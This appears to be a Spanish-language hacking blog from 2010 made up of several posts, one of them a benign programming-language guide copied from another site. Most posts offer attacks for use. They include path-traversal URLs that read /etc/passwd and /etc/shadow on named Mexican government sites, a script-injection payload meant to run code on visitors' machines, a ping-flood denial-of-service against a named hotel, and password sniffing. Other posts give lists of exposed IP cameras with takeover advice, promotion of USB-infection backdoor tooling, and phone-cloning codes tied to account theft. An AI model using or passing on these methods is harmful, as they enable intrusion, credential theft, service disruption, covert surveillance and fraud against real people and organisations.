viernes, 29 de octubre de 2010

Hack Web

Saludos mundo libre.

He aqui una web vulnerable.

http://www.gob.mx/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Full acces

http://www.gob.mx/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow


http://www.gobierno-digital.gob.mx/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

http://www.gobierno-digital.gob.mx/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow

Exelente trabajo ZerOmax.
gracias.
Saludos Mundo Libre.

Inyeccion HTML

Saludos Mundo Libre.

He aqui una tecnica ya muy comun bajo el mundo hacking que ha dado exelentes resultados se trata de la manipulacion de archivos html hay infinidad de webs, blog, foros. donde muchos de ellos permiten el uso de etiquetas html he aqui donde surge nuestra oportunidad donde con un poco de programacion podremos interrogar la base de datos.

Ejemplo.

scrip alerta("te estoy vijilando") scrip

con esto aremos que todos obtengan una bentana con este anuncio es una teccica exelente para empesar a programar en scripting y depositando codigo en los foros como comentarios es un potencial infinito ya que no solo attakamos la web sino cualquier usuario que visite esa web podremos executar codigo en su maquina para insertarle un trollano o lo que queramos o incluso lanzar aplicaciones.

Esto es algo sencillo se consigue executar la aplicacion calculadora en la victima ahora imaginen lo que se puede acer con un codigo mas elavorado.

span datasrc="oExec" datafld="exploit" dataformatas="html" span
xml id="oExec"
security
exploit
CDATA
object id="oFile" cassid=":11111111-1111-1111-1111-111111111111"codebase="c:/winnt/system32/calc.exe" object
exploit
security
html
Saludos Mundo Libre.

jueves, 28 de octubre de 2010

Desfasando

Saludos Mundo Libre.

aqui les desjo una web vulnerable la toman o la dejan el attaque puedeser a su forma de trabajar ya que cuenta con muchos bugs asi que aqui tienen.
mejor forma es con backtrack con brutessh.py

C:\>nmap -sS -v -A 64.13.232.87

Starting Nmap 5.35DC1 ( http://nmap.org ) at 2010-10-28 15:46 Mexico Daylight Ti
me
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 15:46
Scanning 64.13.232.87 [4 ports]
Completed Ping Scan at 15:46, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:46
Completed Parallel DNS resolution of 1 host. at 15:46, 0.03s elapsed
Initiating SYN Stealth Scan at 15:46
Scanning acmkoiegma.gs02.gridserver.com (64.13.232.87) [1000 ports]
Discovered open port 110/tcp on 64.13.232.87
Discovered open port 993/tcp on 64.13.232.87
Discovered open port 995/tcp on 64.13.232.87
Discovered open port 21/tcp on 64.13.232.87
Discovered open port 143/tcp on 64.13.232.87
Discovered open port 22/tcp on 64.13.232.87
Discovered open port 443/tcp on 64.13.232.87
Discovered open port 587/tcp on 64.13.232.87
Discovered open port 80/tcp on 64.13.232.87
Discovered open port 465/tcp on 64.13.232.87
Completed SYN Stealth Scan at 15:47, 17.40s elapsed (1000 total ports)
Initiating Service scan at 15:47
Scanning 10 services on acmkoiegma.gs02.gridserver.com (64.13.232.87)
Completed Service scan at 15:47, 20.27s elapsed (10 services on 1 host)
Initiating OS detection (try #1) against acmkoiegma.gs02.gridserver.com (64.13.2
32.87)
Retrying OS detection (try #2) against acmkoiegma.gs02.gridserver.com (64.13.232
.87)
Initiating Traceroute at 15:47
Completed Traceroute at 15:47, 0.03s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:47
Completed Parallel DNS resolution of 2 hosts. at 15:47, 0.01s elapsed
NSE: Script scanning 64.13.232.87.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 15:47
Completed NSE at 15:49, 81.06s elapsed
Nmap scan report for acmkoiegma.gs02.gridserver.com (64.13.232.87)
Host is up (0.016s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
|_ftp-bounce: no banner
22/tcp open ssh OpenSSH 4.3p2 Debian 5~bpo.1 (protocol 2.0)
| ssh-hostkey: 1024 9c:da:ae:2d:9e:11:a9:b2:91:a0:08:ef:04:d0:05:1a (DSA)
|_1024 3c:6d:5c:99:5d:b5:c6:25:5a:d3:78:8e:d2:f5:7a:01 (RSA)
80/tcp open http Apache httpd 2.0.54
|_html-title: Site doesn't have a title (text/html).
110/tcp open pop3 Courier pop3d
139/tcp closed netbios-ssn
143/tcp open imap Courier Imapd (released 2004)
443/tcp open tcpwrapped
445/tcp closed microsoft-ds
465/tcp open ssl/smtp Exim smtpd 4.63
|_smtp-commands: Couldn't establish connection on port 465
587/tcp open smtp Exim smtpd 4.63
|_smtp-commands: Couldn't establish connection on port 587
993/tcp open ssl/imap Courier Imapd (released 2004)
995/tcp open ssl/pop3 Courier pop3d
Device type: printer|broadband router
Running (JUST GUESSING) : Lexmark embedded (87%), Billion embedded (85%)
Aggressive OS guesses: Lexmark X644e printer (87%), Billion 7404VGP-M ADSL route
r (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: cl04.gs02.gridserver.com, cl36.gs02.gridserver.com; OS: Lin
ux

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 10.00 ms home ()
2 10.00 ms acmkoiegma.gs02.gridserver.com (64.13.232.87)

Read data files from: C:\Program Files\Nmap
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.85 seconds
Raw packets sent: 3084 (139.888KB) | Rcvd: 62 (3.599KB)

saludos Mundo Libre.

wireshark

Saludos Mundo libre.

He aqui una exelente herramienta de snirfado de redes Wireshark de muy sencillo uso para los principiantes en el arte del hacking pero muy potente para esta tecnica lo encontramos en todas las plataformas y con una buena esplicacion interna del programa.

http://www.wireshark.org/

el uso es tan sencilla que solo hay que ejecutar la aplicacion.
2.-Captura.
3.-interface aqui seleccionamos la interface a capturar.
4.-start.

Empieza acapturar los paquetes que nos interezan son los de http asi que en el recuadro de filter ponemos.

5.-http

para que nos capture todos los paquetes lanzados por http que es donde estan los password y users de las victimas.

Esta tecnica lo hago cuando he penetrado una red wifi o en una red publica que es donde hay mucho trafico o incluso en tu escuela, negocio, empresa despues de un rato con el programa cain & bell podremos desencriptar el password o otro que desencripte paswords.

Cuidado donde lo ejecuten ya que a mi me ha costado la chamba muchas ocaciones.
pero con exelentes resultados.
http://media-2.cacetech.com/video/wireshark/introduction-to-wireshark/

Saludos Mundo libre.

miércoles, 27 de octubre de 2010

DDos Attack

Saludos Mundo Libre.

He aqui un attaque dos ataque de denegacion de servicio:

abrimos una shell y ponemos.

#ping www.hotelpuentereal.com

Pinging www.hotelpuentereal.com [200.57.147.1] with 32 bytes of data:

Reply from 200.57.147.1: bytes=32 time=37ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123
Reply from 200.57.147.1: bytes=32 time=36ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123

Ping statistics for 200.57.147.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 35ms, Maximum = 37ms, Average = 35ms

El informe de este ping es obtener la direccion ip de la victima ya que la tengamos

#ping 200.57.147.1 -t -l 65000

Reply from 200.57.147.1: bytes=32 time=37ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123
Reply from 200.57.147.1: bytes=32 time=36ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123
Reply from 200.57.147.1: bytes=32 time=37ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123
Reply from 200.57.147.1: bytes=32 time=36ms TTL=123
Reply from 200.57.147.1: bytes=32 time=35ms TTL=123

y si todo sale bien tiramos el servidor tarde un poco dependiendo de \la velocidad de replica y el servidor estara tirado mientras tengan la coneccion recuerden que esta es una tecnica ya muy conocida y hay muchos servidores ya protejidos con la replica de eco asi que lo ultimo que muere en un hacker es la esperanza asi que adarle.

Saludos Mundo Libre.

martes, 26 de octubre de 2010

Listado Ip Cameras

Saludos Mundo libre.

He aqui un listado de camaras ip algunas funcionan por la noche pero es para referencia del articulo anterior.

Axis 205:

http://camacvt.vmail.ch:81
http://webcam.oii.ox.ac.uk
http://meteopeypin.dnsalias.org
http://webcam2.tombeduciel.com
http://www.ja-ja.ch:82
http://83.64.164.6
http://terrascam.heerenvanbeijerland.nl
http://208.42.203.54:8588
http://212.59.162.17:82

Axis 206:

http://cafecam.heerenvanbeijerland.nl
http://80.126.181.68:8080
http://80.126.56.92
http://212.25.38.101
http://campuscentercam.its.wesleyan.edu
http://208.42.203.54:8585

Axis 207:

http://217.168.94.141
http://128.97.43.214
http://herne.serveftp.net:81
http://stareat.it.helsinki.fi
http://80.126.154.140:8080

Axis 210/211:

http://82.74.20.232
http://87.245.83.189/
http://217.96.55.11
http://129.22.128.85
http://84.246.0.104:82
http://84.246.0.104:83
http://217.126.89.102:8020
http://69.224.130.149
http://69.224.130.150
http://www.webcam5.dk
http://plottercam.wmbinc.com/
http://cam002.ethz.ch
http://85.46.64.155
http://221.29.214.13:800
http://157.228.32.59
http://152.1.131.130
http://62.65.142.226
http://193.27.44.33
http://217.128.151.33
http://192.121.228.226

Axis 212 / 213 PTZ:
[Google : axis live view 213]

http://212.25.38.101
http://82.94.95.101
http://81.175.116.204
http://64.84.107.59
http://webcam5.hrz.tu-darmstadt.de
http://camera6.buffalotrace.com
http://148.213.21.243
http://webcam.lakeconroe.com
http://bouwcam.science.uva.nl
http://klinik-fallingbostel.dnsalias.org
http://213.120.127.53
http://lawcam.law.umt.edu
http://scarcam2.cortn.org

Axis 214 PTZ:

http://guckhin.serveftp.net
http://cam.hotelivalo.fi

Axis 241Q / 241S:

http://64.21.226.243
http://212.92.19.221/
http://217.193.154.122
http://165.91.110.101:2010
http://66.163.131.195
http://61.60.112.230
http://195.243.185.195
http://193.252.215.70:16666
http://209.63.207.158

Axis 21xx:
http://217.197.149.34:7070
http://divinopane.no-ip.info:5101
http://www.broodjesexpress.net:8080
http://62.1.34.103:8084
http://128.255.26.210
http://143.110.2.31

Mobotix M1:
http://134.1.2.81:881
http://85.177.232.238

Mobotix M10:
[Google : inurl:/cgi-bin/guestimage.html]

http://85.194.140.154
http://80.81.48.4
http://78.154.128.253
http://82.218.135.244
http://vseacottages.dnsalias.org
http://carlocantoni.dynalias.org
http://80.122.26.250:7000
http://200.34.194.58

Panasonic BL-Cxx / HCMxxx:
[Google : inurl:/CgiStart intitle:Network Camera]

http://85.144.61.15:8052
http://tezupin.ddo.jp
http://67.111.4.230
http://daichi-yokohama.homeip.net
http://66.255.192.247:50000
http://vetter.viewnetcam.com
http://66.58.254.240:81
http://63.165.41.9
http://camera1.homeentertainmentinc.com
http://221.251.109.90:81
http://140.198.87.253
http://98.190.8.246:1500
http://71.248.101.58:50001
http://druidphilip.viewnetcam.com

Panasonic WV-NP244:

http://68.15.12.110:8005

Sony SNC-RZ30:

http://www.7-milemarina.com
http://24.39.88.218
http://209.208.13.215

MMS Streams:

mms://indieweb-eatv.wm.llnwd.net/indieweb_eatv?MSWMExt=.asf
mms://media.dyu.edu.tw/recursive.asf
mms://vipmms9.yacast.net/mcm_top
mms://live.france24.com/france24_fr.wsx
mms://live.france24.com/france24_en.wsx
mms://tv.lzu.edu.cn/TV4
mms://a1729.l2168647534.c21686.g.lm.akamaistream.net/D/1729/21687/v0001/reflector:50505
mms://202.167.254.196/fox?WMContentBitrate=400000&MSWMExt=.asf
mms://a1729.l2168647534.c21686.g.lm.akamaistream.net/D/1729/21687/v0001/reflector:30206
mms://direct8livewm.fplive.net/direct8live-live/direct8livevid1
mms://tv.lzu.edu.cn/TV1
mms://tv.lzu.edu.cn/TV3
mms://livestream-player.eurosport.com/nogeo/console/_!/eurosportnews_en_doubleauth.wsx?auth=db_aCdcbCdwcu cfaJdGbVdFbcayaCa0cQc9-bhaqxl-4q-b4-CuGoJFCpjx-kgm7kcma
mms://202.167.254.196/nationalgeographic?WMContentBitrate=400000
mms://mosradio-MoSTV247.wm.llnwd.net/mosradio_MoSTV247?MSWMExt=.asf
mms://193.252.152.86/livefr
mms://a1729.l2168647534.c21686.g.lm.akamaistream.net/D/1729/21686/v0001/reflector:55556

voy ampliar la lista mas adelante.

Saludos mundo libre.

traffic ip camera

Saludos Mundo Libre

traffic ip camera es una nueva implementacion de los gobiernos en todo el mundo para el control de las calles y el monitoreo del trafico.

Hack traffic camera Esta es una tecnica no muy comun, pero muy usada para hackers experimentados ya que podemos tener el control de estas tecnicas a nuestro favor ya que no solo sirven para el monitoreo del trafico sino de negocios, hoteles, centros comerciales, bancos, y la lista no termina .

La tecnica es muy sencilla solo hay que entrar en la red wifi de la victima y enpesar a monitorear las ip para localizar las ip camaras y tener el control de las mismas.



Es una tecnica muy interezante para el desface de las mismas y la mayoria de los administradores no las tienen con password y si asi fuera nos vamos ala pagina web de la camara y tendremos el password predeterminado.

saludos Mundo Lidre.

lunes, 25 de octubre de 2010

IP OFUSCADA: 1113982824

Saludos Mundo Libre

Ofuscando una ip es una tecnica muy sencilla es la transformacion de direcciones ip a octatos con operaciones matematicas .

si la ip es www.google.com = 66.102.7.104 nos da lo siguiente:


Info
*Octetos


Primer octeto: 66
Segundo octeto: 102
Tercer octeto: 7
Cuarto octeto: 104

*IP OFUSCADA: 1113982824
Recorda que tenes que usarla y especificar el puerto 80
Usage: http://1113982824:80/

Despues ablare para que sirve esta tecnica y como emplearla para nuestras tecnicas de desfaces.

La Web es http://acidxoft.0fees.net/ofus.php.

saludos mundo Libre

miércoles, 20 de octubre de 2010

Mi Mexico

Saludos Mundo Libre.

He aqui un video conmemorativo al bicentenario de la independencia de mexico eso es lo que los mexicanos crehemos pero no es asi:

http://www.youtube.com/watch?v=_KPhfqYoypA

Ya basta que mexico sea el patio tracero de cualquier pais ya hay que dejar de dependender de otros para hacer algo mexico tiene muchos recursos propios con la caliad de su gente un mexicano no tiene comparacion a ningun otro del mundo un mexicano es un guerrero y no un soldadito de plomo.

Ahora que pienzas.

Saludos Mundo Libre.

martes, 19 de octubre de 2010

Un Lenguaje por favor

Saludos Mundo Libre

He aqui una esplicacion de que lenguaje empezar a practicar.

Una de las preguntas más frecuentes en los foros para principiantes es “¿Cómo iniciarse en programación?” o “¿Qué lenguaje de programación aprender primero?”. En este artículo intentaré responder a estas preguntas, aunque habrán otros que tendrán opiniones diferentes. Para intentar ser objetivo, me he basado en las opiniones sobre este tema de los foros de programación.

Para comenzar, no existe un lenguaje de programación para iniciarse en programación, la programación se comienza sobre un papel, haciendo algoritmos. Claro que para ver si los algoritmos funcionan puede ser más cómodo utilizar un lenguaje de programación. En este caso lo único que recomiendo es utilizar un lenguaje simple que no sea orientado a objetos, ni gráfico. Una buena elección puede ser Basic, Pascal, Python y sobretodo la sintaxis de estos últimos será de mayor utilidad más adelante. Pero no deberiamos excluir ningun lenguaje ya que incluso el lenguaje de una calculadora puede ser suficiente para probar algoritmos simples. También, es bueno tener una idea de los tipos de lenguaje, de lo que es un compilador y otras cosas generales. (http://es.kioskea.net/langages/langages.php3).

A estas alturas, ya tenemos algunas bases para comenzar a programar…algo más, no hay que programar por programar, hay que tener un objetivo, una idea, la necesidad de crear un programa. Aquí, yo nada puedo hacer por ti, esto está en función de tus gustos, conocimientos,..y ahora debemos tomar las primeras decisiones técnicas:
¿Lenguaje orientado a objetos?
¿Multiplataforma?
¿Con máquina virtual?
¿Interfaz usuario?
¿Acceso a una base de datos? ¿Si es así, cuál?

Una vez que hayas respondido a estas interrogantes, el número de lenguajes de programación será más reducido.

A continuación vamos a ver los lenguajes de programación que mayormente son recomendados para iniciarse en programación, teniendo en cuenta el punto de vista del aprendizaje.

Nota: existe también un medio muy lúdico para descubrir la programación: KPL.
KPL significa Kid's Programming Language (la página web: http://phrogram.com/kpl.aspx).

Interfaz impecable (colores, sonido, grafismo) y un aprendizaje de la programación orientada a la concepción de juegos. La idea es: aprender divirtiéndose. Si realmente no sabes nada de nada en informática ni programación, éste puede ser la puerta de entrada. Del mismo modo, éste es un medio para que aprendan los niños. Este programa es un freeware y no está limitado a los juegos, y por supuesto, la página es multilenguaje (inglés, portugués, francés y algunas lenguas nórdicas), al igual que el programa. En cuanto al lenguaje, éste utiliza los términos comúnmente empleados en otros lenguajes: Begin, End, Main, False, True, etc.
Los lenguajes de programación que podemos utilizar

Delphi/Pascal

Una buena solución, los compiladores y entornos de desarrollo se encuentra gratuitamente (bajo ciertas condiciones). Podemos comenzar haciendo pequeños programas en el Shell de Pascal y luego podemos pasar (después de haber aprendido la noción de objeto) a cosas más potentes con entornos gráficos gracias a Delphi (y Kylix bajo Linux). El lenguaje es relativamente intuitivo y riguroso, la creación de interfaz gráfica es simple, rápidamente podemos sentirnos a gusto.
La portabilidad es mediocre pero existe hacia algunas plataformas (Kylix…)

Para aprender Pascal
http://www.programacionfacil.com/programacion:manual_pascal
Página oficial Delphi (Inglés): http://www.codegear.com/en/products/delphi
Desacargar Free Pascal
Java

Lenguaje orientado a objetos, muy portable, sintaxis utilizada también para los scripts de Internet (la sintaxis, no el lenguaje…). Existen gran cantidad de entornos de desarrollo gratuitos en la web: no hay más que elegir en función de nuestros gustos, sin embargo, no tiene la facilidad de Delphi en lo que respecta a la interfaz gráfica. Este es un lenguaje de “última generación” que dará una experiencia interesante a los que deseen trabajar en informática.

Para aprender Java: http://www.manual-java.com/
Lo siento, no tengo más enlaces, no dudes en añadirlos si conoces buenos
Python

Simple, rápido, crea buenas costumbres de programación, ligero (tanto así que pasar a otro lenguaje después se hace pesado), abierto, gran cantidad de documentación en Internet. Este nos permite rápidamente entrar en acción, ya sea creando scripts potentes (gracias a la programación orientada a objetos) u otras cosas. Es también de “ultima generación” y portable. Funciona con una máquina virtual que puede ser empaquetada gracias a algunas clases disponibles en la web (se encuentran de todo tipo y para todos los fines…) en un exe para distribuir la aplicación de manera simple e independiente.

Página oficial de Python (en inglés): http://www.python.org/
Guía de aprendizaje de Python: http://www.programacion.com/tutorial/python/
.Net

Es el futuro según Microsoft, hay cosas buenas y malas en esta plataforma pero permite programar aplicaciones gráficas de manera simple, sólo corre en Windows y con algunas adaptaciones en Linux. Yo recomendaría C# que es el lenguaje “nativo” de esta plataforma: su sintaxis muy similar a la de C y Java, no hay punteros, todo se hace en un nivel de abstracción superior a los antiguos lenguajes de Microsoft. Se compara a Java y a Python, excepto que no es libre.

Un entorno de desarrollo gratuito y Open source para .Net: http://www.icsharpcode.net/OpenSource/SD/
Smalltalk

Para mí el lenguaje orientado a objetos por excelencia. Gratuito, sintaxis simple, impone un rigor sin igual en la programación orientada a objetos. Desgraciadamente no es muy utilizado, es raro encontrar un empleo con éste, pero da una referencia solida, y con cosas como Squeak permiten hacer gran cantidad de cosa con él.

Squeak: http://www.squeak.org/
Tutorial Dolphin Smalltalk: http://www.dolphinmap.net/wiki/Documentation
Los que podemos utilizar en última instancia

C/C++

Estos son buenos lenguajes, pero con una sintaxis complicada que no facilita su aprendizaje. Además el uso de punteros hace que su uso, incluso para los profesionales, sea complicado. La ventaja es que estos lenguajes pueden ser utilizados en diversas plataformas (después de compilación) y que, una vez dominados, hacen que los otros parezcan simples. Estos lenguajes son aún muy utilizados en el mundo profesional. Utilízalo si se deseas hacer de la informática tu profesión.

Para aprender C: http://sopa.dis.ulpgc.es/so/cpp/intro_c/
Para aprender C++: http://zator.com/Cpp/E1_2.htm
Página de Borland C++: http://www.codegear.com/en/products/cppbuilder
PHP

Un lenguaje inicialmente previsto para el desarrollo de páginas web dinámicas. Su sintaxis es muy similar a la de C++. PHP es bastante simple de abordar y permite conectarse fácilmente a una base de datos. Para desarrollar páginas web dinámicas, se requiere también un buen conocimiento de Html y eventualmente de Sql si se necesita una base de datos.
Permite ver rápidamente el trabajo, poniéndolo en línea, y de este modo tener los comentarios/sugerencias de los internautas.
También podemos desarrollar otras aplicaciones que no sean para la web con este lenguaje.
Podemos programar de manera procedural u orientada a objetos, a nuestra elección.
Es un buen lenguaje pero no necesariamente el mejor para aprender. Es potente y permisivo pero con el riesgo de aprender malas costumbres. Especialmente en lo que respecta a las páginas web, éste no influye para que se programe con propiedad desde el inicio.
Si buscas un lenguaje que sea fácil de aprender, que te permita aprender la programación orientada a objetos, y que te deje buenas costumbres de programación, entonces elije mas bien un lenguaje como Python.

Para aprender PHP: http://geneura.ugr.es/~maribel/php/
Página oficial: http://www.php.net/
Ada

Lenguaje aún utilizado en la programación de sistemas de tiempo real. Es fácil de aprender pero es recomendado sobretodo para los futuros informáticos, si no, no hay mucho interés. Es mejor pasar a Ada solamente con el objetivo del “tiempo real” ya que tiende a desaparecer.

Para aprender Ada: http://www.wikilearning.com/curso_gratis/curso_de_ada-introduccion/10578-1
Lo siento, no tengo más enlaces, no dudes en añadirlos si conoces buenos
Lisp/Caml/...

Los lenguajes funcionales son numerosos, están clasificados en dos grandes familias: los puros (haskell) y los no puros (familia lisp). A la vez la familia de los puros están clasificados en dos: los verdaderamente puros, sin efecto efecto secundario (familia haskell) y la familia ML (Caml,SML,...). La manera de programar es totalmente diferente con relación a los otros lenguajes. La programación funcional es otra manera de ver un programa y eso no impide por ejemplo tener un lenguaje funcional y orientado a objetos (scala por ejemplo) o incluso un lenguaje funcional que asocie imperativo/orientado a objetos/funcional (Ocaml). Conocer uno de estos permite tener buenas bases y permitirá también a las personas más orientadas a las matemáticas pasarse suavemente a la informática. Estos por lo general son utilizados en análisis numérico o en inteligencia artificial (pero es sólo a causa de su origen). Podemos utilizarlos para programar todo lo que se puede programar con otros lenguajes (la comunidad commonlisp es muy activa)

http://fr.wikipedia.org/wiki/Common_Lisp
http://www.paulgraham.com/onlisp.html
http://www.scala-lang.org/index.html
Los que no podemos utilizar

(x)HTML/CSS

Voy a ser breve, escribir una página web o un sitio web en HTML es a la programación lo que beber un vaso de agua es al alcoholismo. Aquí se trata de presentar un documento, no de programar, y no porque se agregan algunos scripts esto cambia gran cosa.

Para aprender HTML: http://es.kioskea.net/html/htmlintro.php3
Para aprender DHTML: http://www.programacion.net/html/dinamico/tutorial/principal.htm
Perl

Seamos claros, este lenguaje aparentemente simple no es en lo absoluto adaptado al aprendizaje de la programación. Su flexibilidad y potencia pueden hacer que adquieras malas costumbres de programación e incluso te pueden desalentar por los errores que se están autorizados a cometer. Es mejor comenzar aprendiendo un lenguaje riguroso, para luego explotar al máximo Perl.

Para aprender Perl: http://www.wikilearning.com/...
Visual Basic/Basic: D

Los profesionales que han trabajado con él lo desaconsejan. Este crea malas costumbres de programación (no es necesaria la declaración de variables, ninguna noción de valor/referencia, tentativa fracasada de programar con objetos,…), y además Microsoft (se trata de un lenguaje propietario) lo ha abandonado para privilegiar a Framework.Net. Para terminar, no existe ninguna versión gratuita, por lo tanto necesariamente hay que pagar. El sólo punto positivo que le reconocería es su lado lúdico y la facilidad de hacer interfaces gráficas para Windows (algo que olvidaba, tampoco es portable…), pero no es el único, si es el que te interesa, más bien inclínate hacia Delphi o .Net.
El caso de Basic es más o menos el mismo, existen compiladores gratuitos, pero se trata de un lenguaje obsoleto que no es ni rápido, ni portable, ni orientado a objetos, ni riguroso. Inclínate por Pascal que te permitirá luego evolucionar hacia Delphi.

Para aprender Visual Basic: http://www.lopezdearenas.com/informatica/curso-vb.pdf

Para los matemáticos, pueden intentar los lenguajes de sistemas de gestión de pruebas. Por el momento, su potencia es limitada pero se espera que se desarrollen con el tiempo. Por el momento los que más sobresalen son la familia ML o Haskel. Para Ocaml, tenemos a Coq. Los paradigmas están basados en la lógica.

Para aprender Coq: http://coq.inria.fr/ (en inglés)


Un consejo, es muy común en el mundo de la programación tener que leer artículos en ingles, por lo que aprenderemos a programar en mejores condiciones si podemos leer en inglés o mejor aun si lo podemos escribir. (para hacer preguntas en los foros especializados…).

Bueno, espero que haya sido lo más completo posible.
-------------------------------

Puedes encontrar muchos compiladores gratuitos para diferentes lenguajes en esta dirección:
http://www.thefreecountry.com/

PD: Iniciarse en programación, es también estar confrontado a una espinosa cuestión: ¿Pero por qué mi programa no corre? Los mensajes de error mostrados (o no) por los entornos de compilación o de ejecución (o el comportamiento de los dos) a veces sumergen al principiante en una confusión total que puede volverse exasperante. Un buen método es dar el código a alguien con experiencia para que lo lea primero, y/o explicar a otra persona el problema. A veces decir en voz alta nuestro razonamiento nos pondrá en la vía correcta. Finalmente la capacidad a programar (bien) va (a menudo) de la par con la de abstraerse de este mundo material en el cual nos encontramos sumergidos. Bienvenido al mundo donde nada es realmente concreto.

Si te gusta demasiado la programación, quizás soñaras con ella… Entonces ten en ese momento un papel y un lápiz (el arma de todo informático) en el velador, toma nota de las soluciones que te vienen a la mente y pruébalas por la mañana.

PD: El artículo original fue escrito por teebo contribuidor de CommentCaMarche
gracias.

Texto sacado de :
http://es.kioskea.net/faq/540-que-lenguaje-de-programacion-aprender-primero#introduccion.
Gracias por la exelente explicacion.

Saludos Mundo Libre.

USBsploit 0.3 BETA: USB LNK infection through Meterpreter and files dumping

Saludos Mundo Libre.

PTT para generar puertas inversas traseras TCP, corriendo o infecciones LNK Autorun USB, pero también de dumping todos los USB los archivos de forma remota en varios objetivos al mismo tiempo. USBsploit trabaja a través de sesiones Meterpreter con una luz (27MB) una versión modificada de Metasploit. La interfaz es un mod de SET (El kit de herramientas de ingeniería social). La secuencia de comandos usbsploit.rb Meterpreter del Marco USBsploit lo contrario se puede usar con el original Metasploit Framework.

La versión más reciente de USBsploit es en realidad el Beta 0.3

Informes de los bugs a https: / / twitter.com / o secuobs xavier.poli @ infratech.fr (Recomendado para las cuestiones de privacidad), KEYID: 0x3A3D555A, huellas dactilares: 04B1 244C CC25 EF52 DA93 EB73 E278 881F 3A3D 555A, xpo.asc

La secuencia de comandos usbsploit.rb parece tener algunos problemas si se utiliza con la versión por defecto de Ruby Backtrack 4, instalar una versión 1.9.1 se fija. Los datos que dan en los informes de errores: la versión de Python, la versión de Ruby, la versión de Metasploit si se utiliza, el sistema operativo de los objetivos, el sistema operativo del oyente, los detalles de hardware, tanto para los objetivos y el oyente, sino también para las unidades USB, las soluciones de seguridad instalado en los objetivos y el oyente, la configuración del servidor de seguridad particular, tanto en el destino y el oyente, la versión de VMware u otras personas si se usa, el último archivo de la configuración de descarga, la etapa en la error fue identificado, el mundial opciones USBsploit si ha cambiado, la salida de la verbosidad escaneado de alta, la salida de USBsploit

video de uso:
http://www.youtube.com/watch?v=Qk9Pz4ZOD_Y&feature=player_embedded#!

traduccion de google traductor y informacion sacada de:
http://secuobs.com/news/12102010-usbsploit_v0.3b_meterpreter_msf_1.shtml.
Gracias atodos.
Saludos mundo Libre.

lunes, 18 de octubre de 2010

Clonar My Celular

Saludos Mundo Libre.

He aqui una forma de clonar un celular la fuente fue sacada de:

http://peolplearmenia.galeon.com/enlaces538405.html

Con motivo del articulo anterior para el robo de cuentas de facebook

1) SYSTEM ID
2) LADA < o "Código de Area">
3) NUMERO DE CELULAR
1) SYSTEM ID

Para empezar tienes que saber el numero de identificación del sistema. Esto lo puedes hacer de una manera sencilla:
1)Habla a tu compañía de Celulares y diles que estas reprogramando tu celular, para venderlo o algo así, y "esperemos" que te den un numero de cinco dígitos.
Otra forma de encontrarlo, es reprogramando un celular que se encuentre
en red (acuérdate que a cada compañía le corresponde un SID diferente
Ej.: TELCEL, IUSACELL, etc.
2) LADA o "código de área"
. La lada debe ser un numero de 3 dígitos.
3) NUMERO DE CELULAR
Numero de Celular que quieras clonar, bien, todo el mundo sabe como es un numero de celular pero bueno.
Programando NOKIA.

PARA: NOKIA
21XX,51XX,61XX,636,639,918

1)Prende el teléfono.
2)Presiona *#639#
3)Presiona el numero de celular de 10 dígitos(-- ejemplo:((52)(987)(66666)), presiona OK.
4)Pon el sys id (ejemplo::24580), presiona OK.
5)El teléfono se apaga y se prende solo después.
*NOTA-Si se programa de forma incorrecta aparece: "Activation Failed"

PARA: NOKIA
P1000/100/PT101/PT128/PT228/PT232

1)Prende el teléfono.
2)Presiona *3001#12345
3)La pantalla marca 00
4)Mantén presionado CLR unos segundos
5)Marca el numero de celular de 10 dígitos
6)Presiona store,02,store,CLR (por unos segundos)
7)Pon el sys id
8)Presiona *1*10333*05*05, presiona store
9)presiona 03, presiona store
10)presiona CLR
11)Apaga el teléfono, para terminar la programación

PARA: NOKIA
232/239/515

1)Pon *3001#12345 , presiona STO 00
2)Presiona y mantén presionado CLR (vas a oír 2 beeps)
3)Pon 911#5551212#0 * 12345, STO, 01, STO
4)presiona y mantén presionado CLR (vas a oír 2 beeps)
5)Pon el código de área y el numero de teléfono, presiona STO, 02, STO
6)presiona y mantén presionado CLR (2 beeps)
7)Presiona *1*1 *333*15*05# 0111 * 1 ,STO, 03, STO
8)presiona y mantén presionado CLR (2 beeps)
9)Apaga y vuelve a prender el teléfono

Programando MOTOROLA
Los teléfonos Motorola, se programan igual, todos.

1)presiona FCN, presiona 0000000000000 (13 ceros)
2)Presiona RCL
-pantalla marca "01"
3)Pon el sys ID presiona **
4)pon el Area Code presiona **
5)marca el numero de teléfono presiona **
6)marca el "station class" marca 05 presiona **
7)marca la clase "access overload" (0+2 últimos números del celular) Presiona **
8)marca el "group id" marca 05 presiona **
9)marca la clave de segundad 000000 presiona **
10)marca el numero de 3 dígitos para "unlock" 123 presiona **
